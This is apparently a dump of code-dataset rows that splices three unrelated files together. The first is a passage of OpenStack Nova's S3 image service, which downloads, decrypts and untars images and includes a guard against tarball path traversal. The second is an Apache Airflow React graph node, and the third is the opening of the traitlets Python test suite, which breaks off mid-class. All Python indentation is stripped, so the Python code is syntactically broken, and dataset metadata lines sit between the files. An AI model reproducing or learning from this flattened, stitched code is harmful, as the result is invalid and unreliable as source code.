image_uuid = ec2utils.id_to_glance_id(context, image_id)
image_copy['properties'][prop] = image_uuid
return image_copy
def create(self, context, metadata, data=None):
"""Create an image.
metadata['properties'] should contain image_location.
"""
image = self._s3_create(context, metadata)
return image
def delete(self, context, image_id):
image_uuid = ec2utils.id_to_glance_id(context, image_id)
self.service.delete(context, image_uuid)
def update(self, context, image_id, metadata, data=None):
image_uuid = ec2utils.id_to_glance_id(context, image_id)
metadata = self._translate_id_to_uuid(context, metadata)
image = self.service.update(context, image_uuid, metadata, data)
return self._translate_uuid_to_id(context, image)
def detail(self, context, **kwargs):
#NOTE(bcwaldon): sort asc to make sure we assign lower ids
# to older images
kwargs.setdefault('sort_dir', 'asc')
images = self.service.detail(context, **kwargs)
return self._translate_uuids_to_ids(context, images)
def show(self, context, image_id):
image_uuid = ec2utils.id_to_glance_id(context, image_id)
image = self.service.show(context, image_uuid)
return self._translate_uuid_to_id(context, image)
@staticmethod
def _conn(context):
# NOTE(vish): access and secret keys for s3 server are not
# checked in nova-objectstore
access = CONF.s3_access_key
if CONF.s3_affix_tenant:
access = '%s:%s' % (access, context.project_id)
secret = CONF.s3_secret_key
calling = boto.s3.connection.OrdinaryCallingFormat()
return boto.s3.connection.S3Connection(aws_access_key_id=access,
aws_secret_access_key=secret,
is_secure=CONF.s3_use_ssl,
calling_format=calling,
port=CONF.s3_port,
host=CONF.s3_host)
@staticmethod
def _download_file(bucket, filename, local_dir):
key = bucket.get_key(filename)
local_filename = os.path.join(local_dir, os.path.basename(filename))
key.get_contents_to_filename(local_filename)
return local_filename
def _s3_parse_manifest(self, context, metadata, manifest):
manifest = etree.fromstring(manifest)
image_format = 'ami'
try:
kernel_id = manifest.find('machine_configuration/kernel_id').text
if kernel_id == 'true':
image_format = 'aki'
kernel_id = None
except Exception:
kernel_id = None
try:
ramdisk_id = manifest.find('machine_configuration/ramdisk_id').text
if ramdisk_id == 'true':
image_format = 'ari'
ramdisk_id = None
except Exception:
ramdisk_id = None
try:
arch = manifest.find('machine_configuration/architecture').text
except Exception:
arch = 'x86_64'
# NOTE(yamahata):
# EC2 ec2-budlne-image --block-device-mapping accepts
# <virtual name>=<device name> where
# virtual name = {ami, root, swap, ephemeral<N>}
# where N is no negative integer
# device name = the device name seen by guest kernel.
# They are converted into
# block_device_mapping/mapping/{virtual, device}
#
# Do NOT confuse this with ec2-register's block device mapping
# argument.
mappings = []
try:
block_device_mapping = manifest.findall('machine_configuration/'
'block_device_mapping/'
'mapping')
for bdm in block_device_mapping:
mappings.append({'virtual': bdm.find('virtual').text,
'device': bdm.find('device').text})
except Exception:
mappings = []
properties = metadata['properties']
properties['architecture'] = arch
def _translate_dependent_image_id(image_key, image_id):
image_uuid = ec2utils.ec2_id_to_glance_id(context, image_id)
properties[image_key] = image_uuid
if kernel_id:
_translate_dependent_image_id('kernel_id', kernel_id)
if ramdisk_id:
_translate_dependent_image_id('ramdisk_id', ramdisk_id)
if mappings:
properties['mappings'] = mappings
metadata.update({'disk_format': image_format,
'container_format': image_format,
'status': 'queued',
'is_public': False,
'properties': properties})
metadata['properties']['image_state'] = 'pending'
#TODO(bcwaldon): right now, this removes user-defined ids.
# We need to re-enable this.
metadata.pop('id', None)
image = self.service.create(context, metadata)
# extract the new uuid and generate an int id to present back to user
image_uuid = image['id']
image['id'] = ec2utils.glance_id_to_id(context, image_uuid)
# return image_uuid so the caller can still make use of image_service
return manifest, image, image_uuid
def _s3_create(self, context, metadata):
"""Gets a manifest from s3 and makes an image."""
image_path = tempfile.mkdtemp(dir=CONF.image_decryption_dir)
image_location = metadata['properties']['image_location'].lstrip('/')
bucket_name = image_location.split('/')[0]
manifest_path = image_location[len(bucket_name) + 1:]
bucket = self._conn(context).get_bucket(bucket_name)
key = bucket.get_key(manifest_path)
manifest = key.get_contents_as_string()
manifest, image, image_uuid = self._s3_parse_manifest(context,
metadata,
manifest)
def delayed_create():
"""This handles the fetching and decrypting of the part files."""
context.update_store()
log_vars = {'image_location': image_location,
'image_path': image_path}
def _update_image_state(context, image_uuid, image_state):
metadata = {'properties': {'image_state': image_state}}
self.service.update(context, image_uuid, metadata,
purge_props=False)
def _update_image_data(context, image_uuid, image_data):
metadata = {}
self.service.update(context, image_uuid, metadata, image_data,
purge_props=False)
try:
_update_image_state(context, image_uuid, 'downloading')
try:
parts = []
elements = manifest.find('image').getiterator('filename')
for fn_element in elements:
part = self._download_file(bucket,
fn_element.text,
image_path)
parts.append(part)
# NOTE(vish): this may be suboptimal, should we use cat?
enc_filename = os.path.join(image_path, 'image.encrypted')
with open(enc_filename, 'w') as combined:
for filename in parts:
with open(filename) as part:
shutil.copyfileobj(part, combined)
except Exception:
LOG.exception(_("Failed to download %(image_location)s "
"to %(image_path)s"), log_vars)
_update_image_state(context, image_uuid, 'failed_download')
return
_update_image_state(context, image_uuid, 'decrypting')
try:
hex_key = manifest.find('image/ec2_encrypted_key').text
encrypted_key = binascii.a2b_hex(hex_key)
hex_iv = manifest.find('image/ec2_encrypted_iv').text
encrypted_iv = binascii.a2b_hex(hex_iv)
dec_filename = os.path.join(image_path, 'image.tar.gz')
self._decrypt_image(context, enc_filename, encrypted_key,
encrypted_iv, dec_filename)
except Exception:
LOG.exception(_("Failed to decrypt %(image_location)s "
"to %(image_path)s"), log_vars)
_update_image_state(context, image_uuid, 'failed_decrypt')
return
_update_image_state(context, image_uuid, 'untarring')
try:
unz_filename = self._untarzip_image(image_path,
dec_filename)
except Exception:
LOG.exception(_("Failed to untar %(image_location)s "
"to %(image_path)s"), log_vars)
_update_image_state(context, image_uuid, 'failed_untar')
return
_update_image_state(context, image_uuid, 'uploading')
try:
with open(unz_filename) as image_file:
_update_image_data(context, image_uuid, image_file)
except Exception:
LOG.exception(_("Failed to upload %(image_location)s "
"to %(image_path)s"), log_vars)
_update_image_state(context, image_uuid, 'failed_upload')
return
metadata = {'status': 'active',
'properties': {'image_state': 'available'}}
self.service.update(context, image_uuid, metadata,
purge_props=False)
shutil.rmtree(image_path)
except exception.ImageNotFound:
LOG.info(_("Image %s was deleted underneath us"), image_uuid)
return
eventlet.spawn_n(delayed_create)
return image
def _decrypt_image(self, context, encrypted_filename, encrypted_key,
encrypted_iv, decrypted_filename):
elevated = context.elevated()
try:
key = self.cert_rpcapi.decrypt_text(elevated,
project_id=context.project_id,
text=base64.b64encode(encrypted_key))
except Exception as exc:
msg = _('Failed to decrypt private key: %s') % exc
raise exception.NovaException(msg)
try:
iv = self.cert_rpcapi.decrypt_text(elevated,
project_id=context.project_id,
text=base64.b64encode(encrypted_iv))
except Exception as exc:
raise exception.NovaException(_('Failed to decrypt initialization '
'vector: %s') % exc)
try:
utils.execute('openssl', 'enc',
'-d', '-aes-128-cbc',
'-in', '%s' % (encrypted_filename,),
'-K', '%s' % (key,),
'-iv', '%s' % (iv,),
'-out', '%s' % (decrypted_filename,))
except processutils.ProcessExecutionError as exc:
raise exception.NovaException(_('Failed to decrypt image file '
'%(image_file)s: %(err)s') %
{'image_file': encrypted_filename,
'err': exc.stdout})
@staticmethod
def _test_for_malicious_tarball(path, filename):
"""Raises exception if extracting tarball would escape extract path."""
tar_file = tarfile.open(filename, 'r|gz')
for n in tar_file.getnames():
if not os.path.abspath(os.path.join(path, n)).startswith(path):
tar_file.close()
raise exception.NovaException(_('Unsafe filenames in image'))
tar_file.close()
@staticmethod
def _untarzip_image(path, filename):
S3ImageService._test_for_malicious_tarball(path, filename)
tar_file = tarfile.open(filename, 'r|gz')
tar_file.extractall(path)
image_file = tar_file.getnames()[0]
tar_file.close()
return os.path.join(path, image_file) | unknown | codeparrot/codeparrot-clean | ||
/*!
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
import { Box } from "@chakra-ui/react";
import type { NodeProps, Node as NodeType } from "@xyflow/react";
import { NodeWrapper } from "./NodeWrapper";
import type { CustomNodeProps } from "./reactflowUtils";
export const JoinNode = ({ data }: NodeProps<NodeType<CustomNodeProps, "join">>) => (
<NodeWrapper>
<Box
bg="border.inverted"
borderRadius={`${data.width}px`}
height={`${data.height}px`}
width={`${data.width}px`}
/>
</NodeWrapper>
); | typescript | github | https://github.com/apache/airflow | airflow-core/src/airflow/ui/src/components/Graph/JoinNode.tsx |
# encoding: utf-8
"""Tests for traitlets.traitlets."""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
#
# Adapted from enthought.traits, Copyright (c) Enthought, Inc.,
# also under the terms of the Modified BSD License.
import pickle
import re
import sys
from ._warnings import expected_warnings
from unittest import TestCase
import pytest
from pytest import mark
from traitlets import (
HasTraits, MetaHasTraits, TraitType, Any, Bool, CBytes, Dict, Enum,
Int, CInt, Long, CLong, Integer, Float, CFloat, Complex, Bytes, Unicode,
TraitError, Union, All, Undefined, Type, This, Instance, TCPAddress,
List, Tuple, ObjectName, DottedObjectName, CRegExp, link, directional_link,
ForwardDeclaredType, ForwardDeclaredInstance, validate, observe, default,
observe_compat, BaseDescriptor, HasDescriptors,
)
import six
def change_dict(*ordered_values):
change_names = ('name', 'old', 'new', 'owner', 'type')
return dict(zip(change_names, ordered_values))
#-----------------------------------------------------------------------------
# Helper classes for testing
#-----------------------------------------------------------------------------
class HasTraitsStub(HasTraits):
def notify_change(self, change):
self._notify_name = change['name']
self._notify_old = change['old']
self._notify_new = change['new']
self._notify_type = change['type']
#-----------------------------------------------------------------------------
# Test classes
#-----------------------------------------------------------------------------
class TestTraitType(TestCase):
def test_get_undefined(self):
class A(HasTraits):
a = TraitType
a = A()
with self.assertRaises(TraitError):
a.a
def test_set(self):
class A(HasTraitsStub):
a = TraitType
a = A()
a.a = 10
self.assertEqual(a.a, 10)
self.assertEqual(a._notify_name, 'a')
self.assertEqual(a._notify_old, Undefined)
self.assertEqual(a._notify_new, 10)
def test_validate(self):
class MyTT(TraitType):
def validate(self, inst, value):
return -1
class A(HasTraitsStub):
tt = MyTT
a = A()
a.tt = 10
self.assertEqual(a.tt, -1)
def test_default_validate(self):
class MyIntTT(TraitType):
def validate(self, obj, value):
if isinstance(value, int):
return value
self.error(obj, value)
class A(HasTraits):
tt = MyIntTT(10)
a = A()
self.assertEqual(a.tt, 10)
# Defaults are validated when the HasTraits is instantiated
class B(HasTraits):
tt = MyIntTT('bad default')
self.assertRaises(TraitError, B)
def test_info(self):
class A(HasTraits):
tt = TraitType
a = A()
self.assertEqual(A.tt.info(), 'any value')
def test_error(self):
class A(HasTraits):
tt = TraitType
a = A()
self.assertRaises(TraitError, A.tt.error, a, 10)
def test_deprecated_dynamic_initializer(self):
class A(HasTraits):
x = Int(10)
def _x_default(self):
return 11
class B(A):
x = Int(20)
class C(A):
def _x_default(self):
return 21
a = A()
self.assertEqual(a._trait_values, {})
self.assertEqual(a.x, 11)
self.assertEqual(a._trait_values, {'x': 11})
b = B()
self.assertEqual(b.x, 20)
self.assertEqual(b._trait_values, {'x': 20})
c = C()
self.assertEqual(c._trait_values, {})
self.assertEqual(c.x, 21)
self.assertEqual(c._trait_values, {'x': 21})
# Ensure that the base class remains unmolested when the _default
# initializer gets overridden in a subclass.
a = A()
c = C()
self.assertEqual(a._trait_values, {})
self.assertEqual(a.x, 11)
self.assertEqual(a._trait_values, {'x': 11})
def test_dynamic_initializer(self):
class A(HasTraits):
x = Int(10)
@default('x')
def _default_x(self):
return 11
class B(A):
x = Int(20)
class C(A):
@default('x')
def _default_x(self):
return 21
a = A()
self.assertEqual(a._trait_values, {})
self.assertEqual(a.x, 11)
self.assertEqual(a._trait_values, {'x': 11})
b = B()
self.assertEqual(b.x, 20)
self.assertEqual(b._trait_values, {'x': 20})
c = C()
self.assertEqual(c._trait_values, {})
self.assertEqual(c.x, 21)
self.assertEqual(c._trait_values, {'x': 21})
# Ensure that the base class remains unmolested when the _default
# initializer gets overridden in a subclass.
a = A()
c = C()
self.assertEqual(a._trait_values, {})
self.assertEqual(a.x, 11)
self.assertEqual(a._trait_values, {'x': 11})
def test_tag_metadata(self):
class MyIntTT(TraitType):
metadata = {'a': 1, 'b': 2}
a = MyIntTT(10).tag(b=3, c=4)
self.assertEqual(a.metadata, {'a': 1, 'b': 3, 'c': 4})
def test_metadata_localized_instance(self):
class MyIntTT(TraitType):
metadata = {'a': 1, 'b': 2}
a = MyIntTT(10)
b = MyIntTT(10)
a.metadata['c'] = 3
# make sure that changing a's metadata didn't change b's metadata
self.assertNotIn('c', b.metadata)
def test_union_metadata(self):
class Foo(HasTraits):
bar = (Int().tag(ta=1) | Dict().tag(ta=2, ti='b')).tag(ti='a')
foo = Foo()
# At this point, no value has been set for bar, so value-specific
# is not set.
self.assertEqual(foo.trait_metadata('bar', 'ta'), None)
self.assertEqual(foo.trait_metadata('bar', 'ti'), 'a')
foo.bar = {}
self.assertEqual(foo.trait_metadata('bar', 'ta'), 2)
self.assertEqual(foo.trait_metadata('bar', 'ti'), 'b')
foo.bar = 1
self.assertEqual(foo.trait_metadata('bar', 'ta'), 1)
self.assertEqual(foo.trait_metadata('bar', 'ti'), 'a')
def test_union_default_value(self):
class Foo(HasTraits):
bar = Union([Dict(), Int()], default_value=1)
foo = Foo()
self.assertEqual(foo.bar, 1)
def test_deprecated_metadata_access(self):
class MyIntTT(TraitType):
metadata = {'a': 1, 'b': 2}
a = MyIntTT(10)
with expected_warnings(["use the instance .metadata dictionary directly"]*2):
a.set_metadata('key', 'value')
v = a.get_metadata('key')
self.assertEqual(v, 'value')
with expected_warnings(["use the instance .help string directly"]*2):
a.set_metadata('help', 'some help')
v = a.get_metadata('help')
self.assertEqual(v, 'some help')
def test_trait_types_deprecated(self):
with expected_warnings(["Traits should be given as instances"]):
class C(HasTraits):
t = Int
def test_trait_types_list_deprecated(self):
with expected_warnings(["Traits should be given as instances"]):
class C(HasTraits):
t = List(Int)
def test_trait_types_tuple_deprecated(self):
with expected_warnings(["Traits should be given as instances"]):
class C(HasTraits):
t = Tuple(Int)
def test_trait_types_dict_deprecated(self):
with expected_warnings(["Traits should be given as instances"]):
class C(HasTraits):
t = Dict(Int)
class TestHasDescriptorsMeta(TestCase):
def test_metaclass(self):
self.assertEqual(type(HasTraits), MetaHasTraits)
class A(HasTraits):
a = Int()
a = A()
self.assertEqual(type(a.__class__), MetaHasTraits)
self.assertEqual(a.a,0)
a.a = 10
self.assertEqual(a.a,10)
class B(HasTraits):
b = Int()
b = B()
self.assertEqual(b.b,0)
b.b = 10
self.assertEqual(b.b,10)
class C(HasTraits):
c = Int(30)
c = C()
self.assertEqual(c.c,30)
c.c = 10
self.assertEqual(c.c,10)
def test_this_class(self):
class A(HasTraits):
t = This()
tt = This()
class B(A):
tt = This()
ttt = This()
self.assertEqual(A.t.this_class, A)
self.assertEqual(B.t.this_class, A)
self.assertEqual(B.tt.this_class, B)
self.assertEqual(B.ttt.this_class, B)
class TestHasDescriptors(TestCase):
def test_setup_instance(self):
class FooDescriptor(BaseDescriptor):
def instance_init(self, inst):
foo = inst.foo # instance should have the attr
class HasFooDescriptors(HasDescriptors):
fd = FooDescriptor()
def setup_instance(self, *args, **kwargs):
self.foo = kwargs.get('foo', None)
super(HasFooDescriptors, self).setup_instance(*args, **kwargs)
hfd = HasFooDescriptors(foo='bar')
class TestHasTraitsNotify(TestCase):
def setUp(self):
self._notify1 = []
self._notify2 = []
def notify1(self, name, old, new):
self._notify1.append((name, old, new))
def notify2(self, name, old, new):
self._notify2.append((name, old, new))
def test_notify_all(self):
class A(HasTraits):
a = Int()
b = Float()
a = A()
a.on_trait_change(self.notify1)
a.a = 0
self.assertEqual(len(self._notify1),0)
a.b = 0.0
self.assertEqual(len(self._notify1),0)
a.a = 10
self.assertTrue(('a',0,10) in self._notify1)
a.b = 10.0
self.assertTrue(('b',0.0,10.0) in self._notify1)
self.assertRaises(TraitError,setattr,a,'a','bad string')
self.assertRaises(TraitError,setattr,a,'b','bad string')
self._notify1 = []
a.on_trait_change(self.notify1,remove=True)
a.a = 20
a.b = 20.0
self.assertEqual(len(self._notify1),0)
def test_notify_one(self):
class A(HasTraits):
a = Int()
b = Float()
a = A()
a.on_trait_change(self.notify1, 'a')
a.a = 0
self.assertEqual(len(self._notify1),0)
a.a = 10
self.assertTrue(('a',0,10) in self._notify1)
self.assertRaises(TraitError,setattr,a,'a','bad string')
def test_subclass(self):
class A(HasTraits):
a = Int()
class B(A):
b = Float()
b = B()
self.assertEqual(b.a,0)
self.assertEqual(b.b,0.0)
b.a = 100
b.b = 100.0
self.assertEqual(b.a,100)
self.assertEqual(b.b,100.0)
def test_notify_subclass(self):
class A(HasTraits):
a = Int()
class B(A):
b = Float()
b = B()
b.on_trait_change(self.notify1, 'a')
b.on_trait_change(self.notify2, 'b')
b.a = 0
b.b = 0.0
self.assertEqual(len(self._notify1),0)
self.assertEqual(len(self._notify2),0)
b.a = 10
b.b = 10.0
self.assertTrue(('a',0,10) in self._notify1)
self.assertTrue(('b',0.0,10.0) in self._notify2)
def test_static_notify(self):
class A(HasTraits):
a = Int()
_notify1 = []
def _a_changed(self, name, old, new):
self._notify1.append((name, old, new))
a = A()
a.a = 0
# This is broken!!!
self.assertEqual(len(a._notify1),0)
a.a = 10
self.assertTrue(('a',0,10) in a._notify1)
class B(A):
b = Float()
_notify2 = []
def _b_changed(self, name, old, new):
self._notify2.append((name, old, new))
b = B()
b.a = 10
b.b = 10.0
self.assertTrue(('a',0,10) in b._notify1)
self.assertTrue(('b',0.0,10.0) in b._notify2)
def test_notify_args(self):
def callback0():
self.cb = ()
def callback1(name):
self.cb = (name,)
def callback2(name, new):
self.cb = (name, new)
def callback3(name, old, new):
self.cb = (name, old, new)
def callback4(name, old, new, obj):
self.cb = (name, old, new, obj)
class A(HasTraits):
a = Int()
a = A()
a.on_trait_change(callback0, 'a')
a.a = 10
self.assertEqual(self.cb,())
a.on_trait_change(callback0, 'a', remove=True)
a.on_trait_change(callback1, 'a')
a.a = 100
self.assertEqual(self.cb,('a',))
a.on_trait_change(callback1, 'a', remove=True)
a.on_trait_change(callback2, 'a')
a.a = 1000
self.assertEqual(self.cb,('a',1000))
a.on_trait_change(callback2, 'a', remove=True)
a.on_trait_change(callback3, 'a')
a.a = 10000
self.assertEqual(self.cb,('a',1000,10000))
a.on_trait_change(callback3, 'a', remove=True)
a.on_trait_change(callback4, 'a')
a.a = 100000
self.assertEqual(self.cb,('a',10000,100000,a))
self.assertEqual(len(a._trait_notifiers['a']['change']), 1)
a.on_trait_change(callback4, 'a', remove=True)
self.assertEqual(len(a._trait_notifiers['a']['change']), 0)
def test_notify_only_once(self):
class A(HasTraits):
listen_to = ['a']
a = Int(0)
b = 0
def __init__(self, **kwargs):
super(A, self).__init__(**kwargs)
self.on_trait_change(self.listener1, ['a'])
def listener1(self, name, old, new):
self.b += 1
class B(A):
c = 0
d = 0
def __init__(self, **kwargs):
super(B, self).__init__(**kwargs)
self.on_trait_change(self.listener2)
def listener2(self, name, old, new):
self.c += 1
def _a_changed(self, name, old, new):
self.d += 1
b = B()
b.a += 1
self.assertEqual(b.b, b.c)
self.assertEqual(b.b, b.d)
b.a += 1
self.assertEqual(b.b, b.c)
self.assertEqual(b.b, b.d)
class TestObserveDecorator(TestCase):
def setUp(self):
self._notify1 = []
self._notify2 = []
def notify1(self, change):
self._notify1.append(change)
def notify2(self, change):
self._notify2.append(change)
def test_notify_all(self):
class A(HasTraits):
a = Int()
b = Float()
a = A()
a.observe(self.notify1)
a.a = 0
self.assertEqual(len(self._notify1),0)
a.b = 0.0
self.assertEqual(len(self._notify1),0)
a.a = 10
change = change_dict('a', 0, 10, a, 'change')
self.assertTrue(change in self._notify1)
a.b = 10.0
change = change_dict('b', 0.0, 10.0, a, 'change')
self.assertTrue(change in self._notify1)
self.assertRaises(TraitError,setattr,a,'a','bad string')
self.assertRaises(TraitError,setattr,a,'b','bad string')
self._notify1 = []
a.unobserve(self.notify1)
a.a = 20
a.b = 20.0
self.assertEqual(len(self._notify1),0)
def test_notify_one(self):
class A(HasTraits):
a = Int()
b = Float()
a = A()
a.observe(self.notify1, 'a')
a.a = 0
self.assertEqual(len(self._notify1),0)
a.a = 10
change = change_dict('a', 0, 10, a, 'change')
self.assertTrue(change in self._notify1)
self.assertRaises(TraitError,setattr,a,'a','bad string')
def test_subclass(self):
class A(HasTraits):
a = Int()
class B(A):
b = Float()
b = B()
self.assertEqual(b.a,0)
self.assertEqual(b.b,0.0)
b.a = 100
b.b = 100.0
self.assertEqual(b.a,100)
self.assertEqual(b.b,100.0)
def test_notify_subclass(self):
class A(HasTraits):
a = Int()
class B(A):
b = Float()
b = B()
b.observe(self.notify1, 'a')
b.observe(self.notify2, 'b')
b.a = 0
b.b = 0.0
self.assertEqual(len(self._notify1),0)
self.assertEqual(len(self._notify2),0)
b.a = 10
b.b = 10.0
change = change_dict('a', 0, 10, b, 'change')
self.assertTrue(change in self._notify1)
change = change_dict('b', 0.0, 10.0, b, 'change')
self.assertTrue(change in self._notify2)
def test_static_notify(self):
class A(HasTraits):
a = Int()
b = Int()
_notify1 = []
_notify_any = []
@observe('a')
def _a_changed(self, change):
self._notify1.append(change)
@observe(All)
def _any_changed(self, change):
self._notify_any.append(change)
a = A()
a.a = 0
self.assertEqual(len(a._notify1),0)
a.a = 10
change = change_dict('a', 0, 10, a, 'change')
self.assertTrue(change in a._notify1)
a.b = 1
self.assertEqual(len(a._notify_any), 2)
change = change_dict('b', 0, 1, a, 'change')
self.assertTrue(change in a._notify_any)
class B(A):
b = Float()
_notify2 = []
@observe('b')
def _b_changed(self, change):
self._notify2.append(change)
b = B()
b.a = 10
b.b = 10.0
change = change_dict('a', 0, 10, b, 'change')
self.assertTrue(change in b._notify1)
change = change_dict('b', 0.0, 10.0, b, 'change')
self.assertTrue(change in b._notify2)
def test_notify_args(self):
def callback0():
self.cb = ()
def callback1(change):
self.cb = change
class A(HasTraits):
a = Int()
a = A()
a.on_trait_change(callback0, 'a')
a.a = 10
self.assertEqual(self.cb,())
a.unobserve(callback0, 'a')
a.observe(callback1, 'a')
a.a = 100
change = change_dict('a', 10, 100, a, 'change')
self.assertEqual(self.cb, change)
self.assertEqual(len(a._trait_notifiers['a']['change']), 1)
a.unobserve(callback1, 'a')
self.assertEqual(len(a._trait_notifiers['a']['change']), 0)
def test_notify_only_once(self):
class A(HasTraits):
listen_to = ['a']
a = Int(0)
b = 0
def __init__(self, **kwargs):
super(A, self).__init__(**kwargs)
self.observe(self.listener1, ['a'])
def listener1(self, change):
self.b += 1
class B(A):
c = 0
d = 0
def __init__(self, **kwargs):
super(B, self).__init__(**kwargs)
self.observe(self.listener2)
def listener2(self, change):
self.c += 1
@observe('a')
def _a_changed(self, change):
self.d += 1
b = B()
b.a += 1
self.assertEqual(b.b, b.c)
self.assertEqual(b.b, b.d)
b.a += 1
self.assertEqual(b.b, b.c)
self.assertEqual(b.b, b.d)
class TestHasTraits(TestCase):
def test_trait_names(self):
class A(HasTraits):
i = Int()
f = Float()
a = A()
self.assertEqual(sorted(a.trait_names()),['f','i'])
self.assertEqual(sorted(A.class_trait_names()),['f','i'])
self.assertTrue(a.has_trait('f'))
self.assertFalse(a.has_trait('g'))
def test_trait_metadata_deprecated(self):
with expected_warnings(['metadata should be set using the \.tag\(\) method']):
class A(HasTraits):
i = Int(config_key='MY_VALUE')
a = A()
self.assertEqual(a.trait_metadata('i','config_key'), 'MY_VALUE')
def test_trait_metadata(self):
class A(HasTraits):
i = Int().tag(config_key='MY_VALUE')
a = A()
self.assertEqual(a.trait_metadata('i','config_key'), 'MY_VALUE')
def test_trait_metadata_default(self):
class A(HasTraits):
i = Int()
a = A()
self.assertEqual(a.trait_metadata('i', 'config_key'), None)
self.assertEqual(a.trait_metadata('i', 'config_key', 'default'), 'default')
def test_traits(self):
class A(HasTraits):
i = Int()
f = Float()
a = A()
self.assertEqual(a.traits(), dict(i=A.i, f=A.f))
self.assertEqual(A.class_traits(), dict(i=A.i, f=A.f))
def test_traits_metadata(self):
class A(HasTraits):
i = Int().tag(config_key='VALUE1', other_thing='VALUE2')
f = Float().tag(config_key='VALUE3', other_thing='VALUE2')
j = Int(0)
a = A()
self.assertEqual(a.traits(), dict(i=A.i, f=A.f, j=A.j))
traits = a.traits(config_key='VALUE1', other_thing='VALUE2')
self.assertEqual(traits, dict(i=A.i))
# This passes, but it shouldn't because I am replicating a bug in
# traits.
traits = a.traits(config_key=lambda v: True)
self.assertEqual(traits, dict(i=A.i, f=A.f, j=A.j))
def test_traits_metadata_deprecated(self):
with expected_warnings(['metadata should be set using the \.tag\(\) method']*2):
class A(HasTraits):
i = Int(config_key='VALUE1', other_thing='VALUE2')
f = Float(config_key='VALUE3', other_thing='VALUE2')
j = Int(0)
a = A()
self.assertEqual(a.traits(), dict(i=A.i, f=A.f, j=A.j))
traits = a.traits(config_key='VALUE1', other_thing='VALUE2')
self.assertEqual(traits, dict(i=A.i))
# This passes, but it shouldn't because I am replicating a bug in
# traits.
traits = a.traits(config_key=lambda v: True)
self.assertEqual(traits, dict(i=A.i, f=A.f, j=A.j))
def test_init(self):
class A(HasTraits):
i = Int()
x = Float()
a = A(i=1, x=10.0)
self.assertEqual(a.i, 1)
self.assertEqual(a.x, 10.0)
def test_positional_args(self):
class A(HasTraits):
i = Int(0)
def __init__(self, i):
super(A, self).__init__()
self.i = i
a = A(5)
self.assertEqual(a.i, 5)
# should raise TypeError if no positional arg given
self.assertRaises(TypeError, A)
#-----------------------------------------------------------------------------
# Tests for specific trait types
#-----------------------------------------------------------------------------
class TestType(TestCase):
def test_default(self):
class B(object): pass
class A(HasTraits):
klass = Type(allow_none=True)
a = A()
self.assertEqual(a.klass, object)
a.klass = B
self.assertEqual(a.klass, B)
self.assertRaises(TraitError, setattr, a, 'klass', 10)
def test_default_options(self):
class B(object): pass
class C(B): pass
class A(HasTraits):
# Different possible combinations of options for default_value
# and klass. default_value=None is only valid with allow_none=True.
k1 = Type()
k2 = Type(None, allow_none=True)
k3 = Type(B)
k4 = Type(klass=B)
k5 = Type(default_value=None, klass=B, allow_none=True)
k6 = Type(default_value=C, klass=B)
self.assertIs(A.k1.default_value, object)
self.assertIs(A.k1.klass, object)
self.assertIs(A.k2.default_value, None)
self.assertIs(A.k2.klass, object)
self.assertIs(A.k3.default_value, B)
self.assertIs(A.k3.klass, B)
self.assertIs(A.k4.default_value, B)
self.assertIs(A.k4.klass, B)
self.assertIs(A.k5.default_value, None)
self.assertIs(A.k5.klass, B)
self.assertIs(A.k6.default_value, C)
self.assertIs(A.k6.klass, B)
a = A()
self.assertIs(a.k1, object)
self.assertIs(a.k2, None)
self.assertIs(a.k3, B)
self.assertIs(a.k4, B)
self.assertIs(a.k5, None)
self.assertIs(a.k6, C)
def test_value(self):
class B(object): pass
class C(object): pass
class A(HasTraits):
klass = Type(B)
a = A()
self.assertEqual(a.klass, B)
self.assertRaises(TraitError, setattr, a, 'klass', C)
self.assertRaises(TraitError, setattr, a, 'klass', object)
a.klass = B
def test_allow_none(self):
class B(object): pass
class C(B): pass
class A(HasTraits):
klass = Type(B)
a = A()
self.assertEqual(a.klass, B)
self.assertRaises(TraitError, setattr, a, 'klass', None)
a.klass = C
self.assertEqual(a.klass, C)
def test_validate_klass(self):
class A(HasTraits):
klass = Type('no strings allowed')
self.assertRaises(ImportError, A)
class A(HasTraits):
klass = Type('rub.adub.Duck')
self.assertRaises(ImportError, A)
def test_validate_default(self):
class B(object): pass
class A(HasTraits):
klass = Type('bad default', B)
self.assertRaises(ImportError, A)
class C(HasTraits):
klass = Type(None, B)
self.assertRaises(TraitError, C)
def test_str_klass(self):
class A(HasTraits):
klass = Type('ipython_genutils.ipstruct.Struct')
from ipython_genutils.ipstruct import Struct
a = A()
a.klass = Struct
self.assertEqual(a.klass, Struct)
self.assertRaises(TraitError, setattr, a, 'klass', 10)
def test_set_str_klass(self):
class A(HasTraits):
klass = Type()
a = A(klass='ipython_genutils.ipstruct.Struct')
from ipython_genutils.ipstruct import Struct
self.assertEqual(a.klass, Struct)
class TestInstance(TestCase):
def test_basic(self):
class Foo(object): pass
class Bar(Foo): pass
class Bah(object): pass
class A(HasTraits):
inst = Instance(Foo, allow_none=True)
a = A()
self.assertTrue(a.inst is None)
a.inst = Foo()
self.assertTrue(isinstance(a.inst, Foo))
a.inst = Bar()
self.assertTrue(isinstance(a.inst, Foo))
self.assertRaises(TraitError, setattr, a, 'inst', Foo)
self.assertRaises(TraitError, setattr, a, 'inst', Bar)
self.assertRaises(TraitError, setattr, a, 'inst', Bah())
def test_default_klass(self):
class Foo(object): pass
class Bar(Foo): pass
class Bah(object): pass
class FooInstance(Instance):
klass = Foo
class A(HasTraits):
inst = FooInstance(allow_none=True)
a = A()
self.assertTrue(a.inst is None)
a.inst = Foo()
self.assertTrue(isinstance(a.inst, Foo))
a.inst = Bar()
self.assertTrue(isinstance(a.inst, Foo))
self.assertRaises(TraitError, setattr, a, 'inst', Foo)
self.assertRaises(TraitError, setattr, a, 'inst', Bar)
self.assertRaises(TraitError, setattr, a, 'inst', Bah())
def test_unique_default_value(self):
class Foo(object): pass
class A(HasTraits):
inst = Instance(Foo,(),{})
a = A()
b = A()
self.assertTrue(a.inst is not b.inst)
def test_args_kw(self):
class Foo(object):
def __init__(self, c): self.c = c
class Bar(object): pass
class Bah(object):
def __init__(self, c, d):
